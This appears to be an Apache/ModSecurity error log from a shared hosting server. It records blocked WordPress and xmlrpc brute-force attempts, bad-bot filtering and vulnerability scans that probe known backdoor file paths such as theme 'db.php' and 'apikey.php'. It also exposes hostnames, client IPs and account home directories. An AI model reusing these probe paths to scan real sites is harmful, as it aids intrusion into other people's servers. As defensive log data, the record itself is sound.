[Tue May 26 14:15:55.611440 2026] [security2:error] [pid 598542:tid 598760] [client 85.208.96.210:37198] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/day/2022-02-01/"] [unique_id "ahVdw_4iWyZxnXeAW3JMVQAAAFg"]
[Tue May 26 14:15:55.660493 2026] [security2:error] [pid 598542:tid 598789] [client 14.240.220.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdw_4iWyZxnXeAW3JMRwAAAHU"]
[Tue May 26 14:15:56.128057 2026] [security2:error] [pid 598542:tid 598771] [client 213.35.106.232:52910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-includes/post.php"] [unique_id "ahVdxP4iWyZxnXeAW3JMYgAAAGM"]
[Tue May 26 14:15:56.969207 2026] [security2:error] [pid 598542:tid 598705] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdxP4iWyZxnXeAW3JMdQAAACE"]
[Tue May 26 14:15:57.047469 2026] [security2:error] [pid 598542:tid 598740] [client 213.35.106.232:53157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-includes/user.php"] [unique_id "ahVdxf4iWyZxnXeAW3JMgQAAAEQ"]
[Tue May 26 14:15:58.676152 2026] [security2:error] [pid 598542:tid 598708] [client 202.141.30.10:35535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdxv4iWyZxnXeAW3JMswAAACQ"]
[Tue May 26 14:15:58.676272 2026] [security2:error] [pid 598542:tid 598708] [client 202.141.30.10:35535] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdxv4iWyZxnXeAW3JMswAAACQ"]
[Tue May 26 14:15:59.227310 2026] [security2:error] [pid 598542:tid 598787] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdxv4iWyZxnXeAW3JMvwAAAHM"]
[Tue May 26 14:16:01.557185 2026] [security2:error] [pid 598542:tid 598748] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdyf4iWyZxnXeAW3JNBgAAAEw"]
[Tue May 26 14:16:02.264351 2026] [security2:error] [pid 598542:tid 598799] [client 213.35.106.232:53348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahVdyv4iWyZxnXeAW3JNIgAAAH8"]
[Tue May 26 14:16:02.334292 2026] [security2:error] [pid 598542:tid 598599] [remote 37.187.156.42:32834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVdyv4iWyZxnXeAW3JNHgAAbDg"]
[Tue May 26 14:16:03.710839 2026] [security2:error] [pid 598542:tid 598798] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdy_4iWyZxnXeAW3JNNQAAAH4"]
[Tue May 26 14:16:04.483964 2026] [autoindex:error] [pid 598542:tid 598779] [client 141.98.11.224:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://glorodbalsa.com/
[Tue May 26 14:16:05.167274 2026] [autoindex:error] [pid 598542:tid 598756] [client 141.98.11.224:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://glorodbalsa.com/
[Tue May 26 14:16:05.949519 2026] [security2:error] [pid 598542:tid 598736] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdzf4iWyZxnXeAW3JNewAAAEA"]
[Tue May 26 14:16:06.919354 2026] [security2:error] [pid 598542:tid 598738] [client 64.233.173.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVdzv4iWyZxnXeAW3JNiwAAQkk"]
[Tue May 26 14:16:07.493774 2026] [security2:error] [pid 598542:tid 598790] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdz_4iWyZxnXeAW3JNoQAAAHY"]
[Tue May 26 14:16:09.018505 2026] [security2:error] [pid 598542:tid 598693] [client 2a06:98c0:3600::103:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVd0P4iWyZxnXeAW3JNygAAABU"]
[Tue May 26 14:16:09.668016 2026] [security2:error] [pid 598542:tid 598682] [client 202.141.30.10:35552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd0f4iWyZxnXeAW3JN8AAAAAo"]
[Tue May 26 14:16:09.668173 2026] [security2:error] [pid 598542:tid 598682] [client 202.141.30.10:35552] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd0f4iWyZxnXeAW3JN8AAAAAo"]
[Tue May 26 14:16:09.833613 2026] [security2:error] [pid 598542:tid 598699] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd0f4iWyZxnXeAW3JN5gAAABs"]
[Tue May 26 14:16:10.016901 2026] [security2:error] [pid 598542:tid 598744] [client 43.173.174.164:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVd0f4iWyZxnXeAW3JN1wAAAEg"]
[Tue May 26 14:16:10.520056 2026] [security2:error] [pid 598542:tid 598768] [client 49.13.167.123:62126] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVd0v4iWyZxnXeAW3JOAAAAAGA"], referer: http://ucdc.co.in/
[Tue May 26 14:16:11.404734 2026] [security2:error] [pid 598542:tid 598626] [remote 74.7.241.58:36100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVd0_4iWyZxnXeAW3JOGAAASVM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:16:12.644446 2026] [security2:error] [pid 598542:tid 598702] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd1P4iWyZxnXeAW3JOOQAAAB4"]
[Tue May 26 14:16:14.814488 2026] [security2:error] [pid 598542:tid 598697] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd1v4iWyZxnXeAW3JOcgAAABk"]
[Tue May 26 14:16:16.314669 2026] [security2:error] [pid 598542:tid 598700] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd1_4iWyZxnXeAW3JOmwAAABw"]
[Tue May 26 14:16:17.731952 2026] [security2:error] [pid 598542:tid 598699] [client 123.31.146.172:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd2f4iWyZxnXeAW3JOwAAAABs"]
[Tue May 26 14:16:18.982203 2026] [security2:error] [pid 598542:tid 598679] [client 209.141.46.91:61701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.46.141.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-login.php"] [unique_id "ahVd2v4iWyZxnXeAW3JO4QAAAAc"]
[Tue May 26 14:16:19.227077 2026] [security2:error] [pid 598542:tid 598732] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd2v4iWyZxnXeAW3JO5wAAADw"]
[Tue May 26 14:16:20.729546 2026] [security2:error] [pid 598542:tid 598769] [client 202.141.30.10:35433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd3P4iWyZxnXeAW3JPFAAAAGE"]
[Tue May 26 14:16:20.730257 2026] [security2:error] [pid 598542:tid 598769] [client 202.141.30.10:35433] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd3P4iWyZxnXeAW3JPFAAAAGE"]
[Tue May 26 14:16:21.764688 2026] [security2:error] [pid 598542:tid 598549] [remote 216.73.216.240:45932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-techdata.php"] [unique_id "ahVd3f4iWyZxnXeAW3JPMQAAXAY"]
[Tue May 26 14:16:22.029007 2026] [security2:error] [pid 598542:tid 598798] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd3f4iWyZxnXeAW3JPLQAAAH4"]
[Tue May 26 14:16:23.532392 2026] [security2:error] [pid 598542:tid 598677] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd3_4iWyZxnXeAW3JPVgAAAAU"]
[Tue May 26 14:16:25.956571 2026] [security2:error] [pid 598542:tid 598718] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd4f4iWyZxnXeAW3JPlQAAAC4"]
[Tue May 26 14:16:27.575578 2026] [security2:error] [pid 598542:tid 598557] [remote 178.104.164.71:43982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVd4_4iWyZxnXeAW3JPvQAAAQ4"]
[Tue May 26 14:16:28.275980 2026] [security2:error] [pid 598542:tid 598786] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd4_4iWyZxnXeAW3JP1AAAAHI"]
[Tue May 26 14:16:29.654342 2026] [security2:error] [pid 598542:tid 598739] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd5f4iWyZxnXeAW3JQBAAAAEM"]
[Tue May 26 14:16:31.574409 2026] [security2:error] [pid 598542:tid 598707] [client 202.141.30.10:35400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd5_4iWyZxnXeAW3JQPQAAACM"]
[Tue May 26 14:16:31.574562 2026] [security2:error] [pid 598542:tid 598707] [client 202.141.30.10:35400] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd5_4iWyZxnXeAW3JQPQAAACM"]
[Tue May 26 14:16:31.612439 2026] [security2:error] [pid 598542:tid 598708] [client 114.119.133.1:26209] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/investor-centre-reports"] [unique_id "ahVd5_4iWyZxnXeAW3JQPgAAACQ"], referer: https://panda-eco.com/investor-centre-reports
[Tue May 26 14:16:32.342583 2026] [security2:error] [pid 598542:tid 598684] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd5_4iWyZxnXeAW3JQSAAAAAw"]
[Tue May 26 14:16:33.604819 2026] [autoindex:error] [pid 598542:tid 598716] [client 129.28.84.30:44496] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:16:34.677161 2026] [security2:error] [pid 598542:tid 598719] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd6v4iWyZxnXeAW3JQlgAAAC8"]
[Tue May 26 14:16:36.404525 2026] [security2:error] [pid 598542:tid 598763] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd6_4iWyZxnXeAW3JQ0gAAAFs"]
[Tue May 26 14:16:38.519313 2026] [security2:error] [pid 598542:tid 598758] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd7v4iWyZxnXeAW3JRFQAAAFY"]
[Tue May 26 14:16:39.155823 2026] [security2:error] [pid 598542:tid 598616] [remote 139.84.229.194:41168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.229.84.139.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVd7v4iWyZxnXeAW3JRKAAAAUk"]
[Tue May 26 14:16:40.853649 2026] [security2:error] [pid 598542:tid 598735] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd8P4iWyZxnXeAW3JRSgAAAD8"]
[Tue May 26 14:16:41.408307 2026] [security2:error] [pid 598542:tid 598776] [client 20.151.111.128:4238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-plain.php"] [unique_id "ahVd8f4iWyZxnXeAW3JRYQAAAGg"], referer: www.google.com
[Tue May 26 14:16:41.508005 2026] [security2:error] [pid 598542:tid 598744] [client 20.151.111.128:5090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVd8f4iWyZxnXeAW3JRawAAAEg"], referer: www.google.com
[Tue May 26 14:16:41.728335 2026] [security2:error] [pid 598542:tid 598705] [client 20.151.111.128:5112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVd8f4iWyZxnXeAW3JRcgAAACE"]
[Tue May 26 14:16:42.066511 2026] [security2:error] [pid 598542:tid 598678] [client 123.24.228.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd8f4iWyZxnXeAW3JRbgAAAAY"]
[Tue May 26 14:16:42.619285 2026] [security2:error] [pid 598542:tid 598627] [remote 216.73.216.240:59427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-terms.php"] [unique_id "ahVd8v4iWyZxnXeAW3JRigAAYVQ"]
[Tue May 26 14:16:42.734129 2026] [security2:error] [pid 598542:tid 598703] [client 202.141.30.10:35395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd8v4iWyZxnXeAW3JRiwAAAB8"]
[Tue May 26 14:16:42.734262 2026] [security2:error] [pid 598542:tid 598703] [client 202.141.30.10:35395] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd8v4iWyZxnXeAW3JRiwAAAB8"]
[Tue May 26 14:16:43.031242 2026] [security2:error] [pid 598542:tid 598792] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd8v4iWyZxnXeAW3JRjAAAAHg"]
[Tue May 26 14:16:43.449284 2026] [security2:error] [pid 598542:tid 598759] [client 114.119.139.1:37979] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/service-updates"] [unique_id "ahVd8_4iWyZxnXeAW3JRqAAAAFc"], referer: https://glorodavionics.com/service-updates/
[Tue May 26 14:16:45.534195 2026] [security2:error] [pid 598542:tid 598759] [client 20.151.111.128:12779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVd9f4iWyZxnXeAW3JR6QAAAFc"]
[Tue May 26 14:16:45.731117 2026] [security2:error] [pid 598542:tid 598738] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd9f4iWyZxnXeAW3JR3wAAAEI"]
[Tue May 26 14:16:46.413418 2026] [security2:error] [pid 598542:tid 598704] [client 20.151.111.128:4239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/rymacrlc.php"] [unique_id "ahVd9v4iWyZxnXeAW3JSBgAAACA"], referer: www.google.com
[Tue May 26 14:16:47.515299 2026] [security2:error] [pid 598542:tid 598771] [client 20.151.111.128:4162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVd9_4iWyZxnXeAW3JSLgAAAGM"], referer: www.google.com
[Tue May 26 14:16:47.862292 2026] [security2:error] [pid 598542:tid 598721] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd9_4iWyZxnXeAW3JSKQAAADE"]
